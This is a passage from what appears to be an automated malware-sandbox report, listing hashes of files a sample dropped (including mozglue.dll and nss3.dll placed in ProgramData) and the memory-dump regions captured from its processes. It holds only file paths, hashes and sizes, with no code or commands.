361cd0082558c6df0e588cb71d77115f58d1880242a713e2bb74b02e19d6b4bd

SHA512
98d196ed25be9d2f2471f8ef0a737f50705975ff93fc2451b588e89d9b4fe866352e8e5904b9140f1c7bcc7fcad8748c637253922caa091fb17ebcf08f8243f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\GEpth.eXe
MD5
d8a81f4f7e64f2e5f3c4bef85c23931b

SHA1
6df6b63f7c717945d57ac8e9189efb1c42aa6a24

SHA256
361cd0082558c6df0e588cb71d77115f58d1880242a713e2bb74b02e19d6b4bd

SHA512
98d196ed25be9d2f2471f8ef0a737f50705975ff93fc2451b588e89d9b4fe866352e8e5904b9140f1c7bcc7fcad8748c637253922caa091fb17ebcf08f8243f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\VjM7A_.O
MD5
640d61152bd2275e1943dde411c1c0df

SHA1
6f536b58b05546d2175ff35485901b90df46e642

SHA256
e81b03ee8fa401688c12afcc77b2d699c6c557866c078764fcec5834dffd75ac

SHA512
e586e199587aa5e156c9dd40498a18323980993e7c43958cfb685b0daebaa0df64fc81ecb025622b93d847bad3d5509182cf335f97cef791d99d7696e3a996d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\b_YXEl0G._J
MD5
ac6ad5d9b99757c3a878f2d275ace198

SHA1
439baa1b33514fb81632aaf44d16a9378c5664fc

SHA256
9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

SHA512
bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\rtKwu.vjJ
MD5
e277cbe00c6606584bce930b2f3218c9

SHA1
6d09be44853b22c9f80cba50bbc4fff89f060f47

SHA256
c8d287f65ccac6630495d8d41ca85c51b3c9cc76b6c492bd4894df57339ccfd9

SHA512
86d17f539da1a73f7dc25f2128a4df933246f976ad66b6ec04ecc4219a3079d061df6ed5529c075c400db2f52d3e2cf6f18325f75d4e46f55030557e71159229

Download Submit
C:\Users\Admin\AppData\Local\Temp\f3OS.H
MD5
cfb22a4a48cf1c24eeef631e67283d56

SHA1
744aeeaaf90e106bbf75221c9d4fad46932ce982

SHA256
55cc67642bf23f39a6aeeb46155b73379ff86a9153f904ff3177f5c3b131b077

SHA512
6e43366f8f283337b13dda1979fb440434b71b67772414cc050075d31ece46b2b4c8df2ebc7f586b53aff9cf1dc309539af45ad513916a46cc074e4eaec6d1a4

Download Submit
\ProgramData\mozglue.dll
MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
\Users\Admin\AppData\Local\Temp\F3Os.H
MD5
cfb22a4a48cf1c24eeef631e67283d56

SHA1
744aeeaaf90e106bbf75221c9d4fad46932ce982

SHA256
55cc67642bf23f39a6aeeb46155b73379ff86a9153f904ff3177f5c3b131b077

SHA512
6e43366f8f283337b13dda1979fb440434b71b67772414cc050075d31ece46b2b4c8df2ebc7f586b53aff9cf1dc309539af45ad513916a46cc074e4eaec6d1a4

Download Submit
memory/364-217-0x0000000005440000-0x00000000054F5000-memory.dmp

Filesize
724KB

Download
memory/364-216-0x00000000052C0000-0x0000000005376000-memory.dmp

Filesize
728KB

Download
memory/364-191-0x0000000003390000-0x0000000003391000-memory.dmp

Filesize
4KB

Download
memory/364-228-0x00000000055D0000-0x000000000566B000-memory.dmp

Filesize
620KB

Download
memory/364-185-0x0000000000000000-mapping.dmp

Download
memory/364-227-0x0000000005510000-0x00000000055BF000-memory.dmp

Filesize
700KB

Download
memory/600-180-0x0000000000000000-mapping.dmp

Download
memory/644-120-0x0000000000000000-mapping.dmp

Download
memory/876-181-0x0000000000000000-mapping.dmp

Download
memory/920-125-0x0000000000402DD8-mapping.dmp

Download
memory/1028-219-0x00000000024C6000-0x0000000002542000-memory.dmp

Filesize
496KB

Download
memory/1028-220-0x0000000004060000-0x0000000004135000-memory.dmp

Filesize
852KB

Download
memory/1028-224-0x0000000000400000-0x0000000002414000-memory.dmp

Filesize
32.1MB

Download
memory/1028-207-0x0000000000000000-mapping.dmp

Download
memory/1104-168-0x0000000000000000-mapping.dmp

Download
memory/1216-133-0x00000000049B0000-0x00000000049B1000-memory.dmp

Filesize
4KB

Download
memory/1216-135-0x0000000004B30000-0x0000000004B31000-memory.dmp

Filesize
4KB

Download
memory/1216-127-0x0000000000000000-mapping.dmp

Download
memory/1216-130-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/1216-132-0x0000000004A30000-0x0000000004A31000-memory.dmp

Filesize
4KB

Download
memory/1216-134-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/1308-211-0x0000000000000000-mapping.dmp

Download
memory/1308-214-0x00000000001E0000-0x00000000001E7000-memory.dmp

Filesize
28KB

Download
memory/1308-215-0x00000000001D0000-0x00000000001DC000-memory.dmp

Filesize
48KB

Download
memory/1364-169-0x0000000000000000-mapping.dmp

Download
memory/1900-160-0x00000000070C0000-0x00000000070C1000-memory.dmp

Filesize
4KB

Download
memory/1900-152-0x0000000005490000-0x0000000005A96000-memory.dmp

Filesize
6.0MB

Download
memory/1900-161-0x00000000077C0000-0x00000000077C1000-memory.dmp

Filesize
4KB

Download
memory/1900-155-0x00000000058E0000-0x00000000058E1000-memory.dmp

Filesize
4KB

Download
memory/1900-143-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1900-149-0x00000000054F0000-0x00000000054F1000-memory.dmp

Filesize
4KB

Download
memory/1900-153-0x0000000005590000-0x0000000005591000-memory.dmp

Filesize
4KB

Download
memory/1900-148-0x0000000005AA0000-0x0000000005AA1000-memory.dmp

Filesize
4KB

Download
memory/1900-151-0x0000000005550000-0x0000000005551000-memory.dmp

Filesize
4KB

Download
memory/1900-157-0x0000000006450000-0x0000000006451000-memory.dmp

Filesize
4KB

Download
memory/1900-150-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/1900-144-0x0000000000418EEA-mapping.dmp

Download
memory/1972-140-0x00000000001D0000-0x00000000001D8000-memory.dmp

Filesize
32KB

Download
memory/1972-141-0x00000000001F0000-0x00000000001F9000-memory.dmp

Filesize
36KB

Download
memory/1972-142-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1972-136-0x0000000000000000-mapping.dmp

Download
memory/2044-210-0x0000000000000000-mapping.dmp

Download
memory/2044-212-0x0000000000A70000-0x0000000000AE4000-memory.dmp

Filesize
464KB

Download
memory/2044-213-0x0000000000A00000-0x0000000000A6B000-memory.dmp

Filesize
428KB

Download
memory/2388-174-0x0000000000000000-mapping.dmp

Download
memory/2880-225-0x0000000002AE0000-0x0000000002AE2000-memory.dmp

Filesize
8KB

Download
memory/2880-226-0x0000000002AE0000-0x0000000002AE2000-memory.dmp

Filesize
8KB

Download
memory/2880-139-0x0000000000B70000-0x0000000000B86000-memory.dmp

Filesize
88KB

Download
memory/2880-154-0x00000000029C0000-0x00000000029D6000-memory.dmp

Filesize
88KB

Download
memory/2880-119-0x0000000000850000-0x0000000000866000-memory.dmp

Filesize
88KB

Download
memory/2940-178-0x0000000000000000-mapping.dmp

Download
memory/3168-172-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/3168-170-0x0000000000000000-mapping.dmp

Download
memory/3168-173-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/3668-177-0x0000000000000000-mapping.dmp

Download
memory/4176-118-0x00000000040C0000-0x00000000040C9000-memory.dmp

Filesize
36KB

Download
memory/4264-117-0x0000000000402DD8-mapping.dmp

Download
memory/4264-116-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/4516-163-0x0000000000000000-mapping.dmp

Download
memory/4516-165-0x0000000002AF0000-0x0000000002AF1000-memory.dmp

Filesize
4KB

Download
memory/4516-166-0x0000000002AF0000-0x0000000002AF1000-memory.dmp

Filesize
4KB

Download
memory/4568-176-0x0000000000000000-mapping.dmp

Download
memory/4976-198-0x0000000004432000-0x0000000004433000-memory.dmp

Filesize
4KB

Download
memory/4976-188-0x0000000000000000-mapping.dmp

Download
memory/4976-192-0x00000000026D8000-0x0000000002704000-memory.dmp

Filesize
176KB

Download
memory/4976-193-0x00000000023D0000-0x000000000251A000-memory.dmp

Filesize
1.3MB

Download
memory/4976-194-0x0000000004430000-0x0000000004431000-memory.dmp

Filesize
4KB

Download
memory/4976-195-0x0000000004280000-0x00000000042AD000-memory.dmp

Filesize
180KB

Download
memory/4976-205-0x00000000076F0000-0x00000000076F1000-memory.dmp

Filesize
4KB

Download
memory/4976-196-0x0000000000400000-0x00000000023C4000-memory.dmp

Filesize
31.8MB

Download
memory/4976-200-0x00000000043D0000-0x00000000043FC000-memory.dmp

Filesize
176KB

Download
memory/4976-199-0x0000000004433000-0x0000000004434000-memory.dmp

Filesize
4KB

Download
memory/4976-206-0x0000000004434000-0x0000000004436000-memory.dmp

Filesize
8KB

Download
memory/5024-179-0x0000000000000000-mapping.dmp

Download